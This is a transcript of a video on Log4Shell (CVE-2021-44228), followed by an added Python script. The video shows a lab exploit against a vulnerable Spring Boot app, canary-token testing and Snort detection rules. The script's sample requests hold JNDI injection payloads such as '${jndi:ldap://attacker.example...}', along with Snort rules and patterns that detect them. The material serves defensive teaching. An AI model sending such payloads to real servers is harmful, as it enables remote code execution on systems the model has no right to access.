CVE-2021-44228 (Log4Shell) - Exploitation/Detection

Captions
Right here. All right, all right, hello everyone, I hope you're all having a good weekend. So this week we're going to take a look at this new CVE-2021-44228, also known as Log4Shell. So my agenda for today is to first show an example of Log4Shell exploitation; second, we're going to show how we could use the new Log4Shell canary token; and then finally we are going to show how we can detect this with Snort.

So a little bit of background: this week there was a zero-day called Log4Shell, as I mentioned, that was discovered, and it results in remote code execution from logging a particular string, and this vulnerable log4j library is found in a lot of Java applications, so this makes it a really critical vulnerability. And from what I'm reading it just seems to be getting worse and worse; like, I can't even keep track of everything that's going on right now. So let's dive in, let's see how it works, let's analyze some network traffic with Snort, and we will see how we can detect this.

So if you see on my screen here, we're about to run this vulnerable Java application. So this vulnerable Java application is called Spring Boot, and it's an open-source Java-based framework that you could create a microservice with. So in this particular app it's going to log an X-Api-Version from the HTTP header on the server, and that's what's making it vulnerable. So I just wanted to show real quick, you guys could see on my Firefox, right? But yeah, okay, I just want to show real quick what that application looks like just so we have an idea. So we could see here that this request header gets logged, and we can see that it's using this log4j package which is vulnerable. So let me go back here, let's start up the app. While that's going, let's just see real quick here, let's just talk about the exploit requirements. So the server has to have a vulnerable log4j version like the one that I showed you; the endpoint must have a protocol like HTTP, TCP, I think it's even exploitable over UDP, and I've seen quite a few others as well; if you take a look at, like, Emerging Threats Snort rules you can kind of see all the different protocols there. And finally, it's going to have to log out the string like we showed you.

So okay, this is running here. So the second thing we're going to have to do is we're going to want to download this JNDI exploit, LDAPs. It's a GitHub package, I don't have it up here actually, but it's basically just a malicious LDAP server that is going to handle a request. So once we log that string, it's going to make a request out to our LDAP server here that we're going to start. So I already have this installed, but if you don't you can just do wget on this GitHub, then you just unzip JNDI exploit, but I already have that, so we're just going to start that up. Let's just change our IP, make sure we know that. I guess I don't have that. Okay. Oh yeah, oh, is that what I did? I've been using PowerShell so much lately that I'm starting to mix it up. "Me too." Thank you. All right, so we're going to start this up. You can see here, just take note of this because this is not normal, I don't think; I never see LDAP listening on this port, but I guess it does have the 389, so just keep note of that. And let's just clean this up real fast. Okay, just trying to get everything together here.

So what we're going to do here is we're going to run this exploit against it, and what this is doing here is, it's going to log, like I mentioned, it's going to log the X-Api-Version, and what this is doing here, we could actually take a look. Oh, I just accidentally opened that link. So what this is doing here is it's just going to make a pwn file in the temp directory, so we're going to just see if that works, but first let's make sure we fill in our IP here, and let's send it. So we sent this to the server, you could actually see that it was received, and let's actually take a look and see if it actually is on the server here. So if we take a look, what this is doing is, this is just executing a docker command and just showing us the output of the temp directory, and we can see that that pwn file that we created, where is it, here, was created. So that's pretty cool.

But I actually found out this morning that they even have this canary token. Do I have it up here? No, I do not, but I do have it ready to go. So there's this canary token that I already generated here, and let me just move, I have everybody in the corner here, I can't even see my screen. So this canary token, if this exploit is, or if this application is vulnerable, it's going to generate a canary token that I'm going to receive in my inbox here; you can see this morning I already received one. So let's try that. And actually I'm not too sure if anybody in here knows, but this just kind of hangs like this, but it should still trigger it unless something went wrong, but it did take a little while this morning. "Did you have to specify your hostname, or is that already set?" That's what I thought this morning, because I tried that and it didn't work, and it actually is "hostname" like that. I thought that was very weird myself. Let me find it, maybe I did get something wrong, or maybe it only lasts for a little while. Does anybody know? Maybe I needed to generate a new one. Oh, let's take a look. No, that did not happen, but when I did test this this morning it did. So you know what, why don't we, let me try it out real quick. What is it, canarytokens.org? Let's just search. So we can select our token, and it's the new Log4Shell one, provide an email address, it's just a backup email, and a reminder note, we'll just do "Log4Shell was successful". Now let's create our token, copy this in, and let's give this another try. It doesn't look like it likes it for some reason now. Oh no, it did. Nice, good, yeah, cool. All right, so yeah, that's how we could use this new canary token. I was thinking that it was going to be used for something else, like I thought it would be more of a honeypot, but this is really just so you could use it and see if the exploit actually works.

And it's actually kind of similar, I don't know if you guys saw, there's this Log4Shell tester by Huntress which is very similar to what I just used. I guess let me just show that real quick, so you could also use this as well, and like you would copy this in and then you would go in here and view the connections, which is just similar to, it's sending it back to me as an email. So yeah, that's that part.

So we already verified that that worked, so now let's do some detection with Snort. So let's open this up, let's go into our pcaps. So I didn't record the pcaps right now, I forgot to do that, but I did it earlier, so if you want to do that yourself you can just do sudo tcpdump -i docker0 for the docker interface, and then you could just write it out too, you just say log4shell.pcap, but I already did that. So let's take a look at, this is the first exploit that we did, remember this, this just was creating that pwn file, and then this is the pcap for that, so let's check that out with Wireshark. Okay, I believe this is it, yeah, you can see it down there, so let's follow that. And so yeah, so what we're going to want to do here is, we're going to want to look inside this payload, and we're going to want to look for something like jndi:ldap, and that's something that we could do with Snort with their content, just with content with Snort, and I'll show that in a second here. So let's close this and let's take a look at our Snort configuration here, or our Snort rule that we're going to create; that's in vim /etc/snort/rules, and then local.rules are any custom rules that you're going to use, the other ones are just default Snort rules. So we're going to use one very similar to the one that CrowdStrike posted yesterday, because it's very simple, but I'm going to tell you right now that it's not the most effective, because they've found out a lot, there's a lot more ways to obfuscate this payload, but this is just an example so we could see how to use this in practice.

So this is pretty inefficient, but this is just looking for any TCP from any IP, any port, going to any IP or any port, and we can actually just, we could make our own message here. So the message, oh whoops, this is a read-only file, whoops. Okay, that's much better. So this message is just going to be the alert that it shows when we run Snort and the rule was successful, so we'll just say "Log4Shell detected", and the content we're going to look for, if you remember looking at Wireshark or our exploit which was up here, it just has this jndi:ldap, so that's all we're going to look for here. And to make it a bit more efficient we can add the flow that we want to look for, so we could say from client, and we could also say established, so we want to see this payload come from a client going to an HTTP, or going to some vulnerable application; we want to make sure that it was already established, because we don't want to waste our Snort resources looking at every single packet, we want to make sure that the TCP handshake has already been established here. And we can just define a classtype. The sid always has to be a unique value, otherwise it won't alert, and this is usually the revision number; that looks like somebody took quite a few revisions here to get that one working, I don't know why they use that. And then usually just put a reference at the end.

All right, so as I showed you guys this tcpdump pcap, let's now use Snort, and I don't have it in my history, so I have it copied here. Let's show how we can test with Snort. So this is going to use our Snort configuration, this is just the default Snort configuration that you get once you install it; this is just going to say alert out to our console, so just alert to the terminal here; we're going to read in our pcap, which, that is the wrong one; we want to log this, so I have a log directory, actually I don't in here, that's a good thing to note, so that's going to just log it here. And I found, and I actually don't remember what this means, this -k none, but when I was trying it yesterday, like I took one of these SANS courses where we had to do this, and I could not figure out for the life of me why I was able to get it in the SANS class and I couldn't get it on this terminal, and it was this -k none. So actually let's just take a look real quick and see what that is, because now I'm curious. It's just saying logging mode none, very odd that it wouldn't work. If anybody in here knows, let me know, but yeah. "Wasn't that lowercase k? Wasn't it the checksum validation? Yeah, I've had to do it with Zeek too, like if you try to run a pcap, like capture a pcap, you try to run it through Zeek, lots of times the TCP checksum will be invalid, so if you disable checksums it'll actually process the packets." That makes sense, okay, yep, I remember learning that now, thank you. And yeah, you're right, I was looking at the wrong one. Okay, so that's interesting. And -q I believe is just don't show, like when Snort is initializing, I don't know if anybody's ever played around with Snort like this before, but when it initializes you just see all this stuff printed out to the screen that you really don't need to see.

So we run this, and since we see this output we know that the Snort alert worked on that pcap. So this is a really good way to test Snort rules against network traffic that you're seeing, and sometimes it's nice to do an exploit like I just did, record it, and then do it in your own lab before doing it in production. But I really want to take a look here, because that is not the most efficient rule we could do. I would highly recommend that you go to, like, a page like Emerging Threats and pull down their Snort rules, because their security engineers are working on this, you know, way more than I am, and they're probably all collaborating on it, so it's a good idea to pull these down and take a look at them yourself. You can see they're doing stuff here like they're inspecting the bytes, so 3a I believe is a colon. So it's just a much, much more efficient rule than we wrote, but it's still important to be able to write your own rules here, because maybe this zero-day comes out and one of your favorite threat intel sources, like Emerging Threats, doesn't have this yet, so it's important to know how to write your own and be able to do this on your own for some advanced threats.

And finally, I just wanted to talk real quick, where is that, I just want to talk real quick about some of the different payloads that I've seen online, and like when you're hunting, just to be aware that, you know, we used a payload like this, but they've seen payloads like this, I've personally seen payloads like this. So it's, you know, there's a lot of different ways to go about this, and you can't just look for this one particular string here. And I have, you know, I have the source up here where these were found from. And finally, actually, if you have a web application firewall, there's a lot of companies that are coming out with, like, templates right now that'll help detect this as it keeps evolving, so just be aware of that and check your web application firewall to see if they have something available. All right, so with that, that was Log4Shell. Good luck everyone. "Awesome, thanks."
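The rule described in the talk (literal `jndi:ldap` content, `flow:to_server,established`, a message, classtype, sid and rev) is easy to write down and just as easy to miss with. As an added example that is not code from the video, from Snort or from any vendor ruleset, the Python below parses two rule lines in Snort syntax and applies their `content`/`nocase`/`pcre` checks to a handful of constructed HTTP requests carrying the `X-Api-Version` header the demo app logs. The sample requests, the `attacker.example`/`target.example` hosts and the `sid` values are all constructed placeholders; the `flow:` option is parsed but not evaluated, since there is no TCP state in this simulation. It shows that the literal rule fires only on the exact demo string, while a case-insensitive rule with a `pcre` over the other JNDI schemes also catches the upper-cased and `rmi` variants without alerting on a benign header.

```python
import re

# Constructed sample HTTP requests (not traffic captured in the video), modelled on the
# X-Api-Version header the demo Spring Boot app logs. Hostnames are placeholders.
SAMPLE_REQUESTS = {
    "demo_payload": "GET / HTTP/1.1\r\nHost: target.example\r\n"
                    "X-Api-Version: ${jndi:ldap://attacker.example:1389/a}\r\n\r\n",
    "upper_case":   "GET / HTTP/1.1\r\nHost: target.example\r\n"
                    "X-Api-Version: ${JNDI:LDAP://attacker.example:1389/a}\r\n\r\n",
    "rmi_scheme":   "GET / HTTP/1.1\r\nHost: target.example\r\n"
                    "X-Api-Version: ${jndi:rmi://attacker.example:1099/a}\r\n\r\n",
    "benign":       "GET / HTTP/1.1\r\nHost: target.example\r\n"
                    "X-Api-Version: 1.0.0\r\n\r\n",
}

# Rule as described in the talk: any TCP, client-to-server on an established flow,
# literal "jndi:ldap" content. sid/rev/classtype values are placeholders.
SIMPLE_RULE = ('alert tcp any any -> any any (msg:"Log4Shell detected"; '
               'flow:to_server,established; content:"jndi:ldap"; '
               'classtype:web-application-attack; sid:1000001; rev:1;)')

# Same shape, but case-insensitive and covering other JNDI schemes via pcre.
BROADER_RULE = ('alert tcp any any -> any any (msg:"Log4Shell JNDI lookup, broad"; '
                'flow:to_server,established; content:"jndi"; nocase; '
                r'pcre:"/\$\{[^}]*jndi:(ldap|ldaps|rmi|dns)/i"; '
                'classtype:web-application-attack; sid:1000002; rev:1;)')

_OPT_SPLIT = re.compile(r';(?=(?:[^"]*"[^"]*")*[^"]*$)')  # split on ';' outside quotes


def parse_rule(rule):
    """Return (header tokens, [(option, value), ...]) for one Snort rule line."""
    header, _, body = rule.partition("(")
    opts = []
    for raw in _OPT_SPLIT.split(body.strip().rstrip(")")):
        raw = raw.strip()
        if raw:
            key, _, val = raw.partition(":")
            opts.append((key.strip(), val.strip().strip('"')))
    return header.split(), opts


def build_checks(opts):
    """Turn content/nocase/pcre options into payload checks.
    flow: is accepted but not evaluated (no TCP state in this simulation)."""
    checks = []
    for key, val in opts:
        if key == "content":
            checks.append({"kind": "content", "pattern": val, "nocase": False})
        elif key == "nocase" and checks and checks[-1]["kind"] == "content":
            checks[-1]["nocase"] = True           # nocase modifies the preceding content
        elif key == "pcre":
            body, _, flags = val[1:].rpartition("/")   # "/regex/flags" -> regex, flags
            checks.append({"kind": "pcre",
                           "regex": re.compile(body, re.I if "i" in flags else 0)})
    return checks


def rule_matches(rule, payload):
    """True when every content/pcre check of the rule is satisfied by the payload."""
    _, opts = parse_rule(rule)
    for c in build_checks(opts):
        if c["kind"] == "content":
            hay, needle = ((payload.lower(), c["pattern"].lower()) if c["nocase"]
                           else (payload, c["pattern"]))
            if needle not in hay:
                return False
        elif not c["regex"].search(payload):
            return False
    return True


def rule_field(rule, name):
    """Fetch a single option value (msg, sid, ...) from a rule line."""
    return dict(parse_rule(rule)[1]).get(name)


def scan(rules, requests):
    """Map each request name to the list of sids whose checks fire on it."""
    return {name: [rule_field(r, "sid") for r in rules if rule_matches(r, payload)]
            for name, payload in requests.items()}


if __name__ == "__main__":
    for name, sids in scan([SIMPLE_RULE, BROADER_RULE], SAMPLE_REQUESTS).items():
        print(f"{name:13s} -> {sids or 'no alert'}")
```

Running it prints one line per sample request; only `demo_payload` trips the literal rule, while the broader rule also fires on `upper_case` and `rmi_scheme` and stays quiet on `benign`. This is the same exercise as replaying a pcap through `snort -r` with a local.rules entry, just without the packet layer, which makes it handy for sanity-checking a content pattern before it goes into a live sensor.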
Info
Channel: Kandy Phan
Views: 2,036
Id: VLBKd429K2Y
Length: 16min 10sec (970 seconds)
Published: Sun Dec 12 2021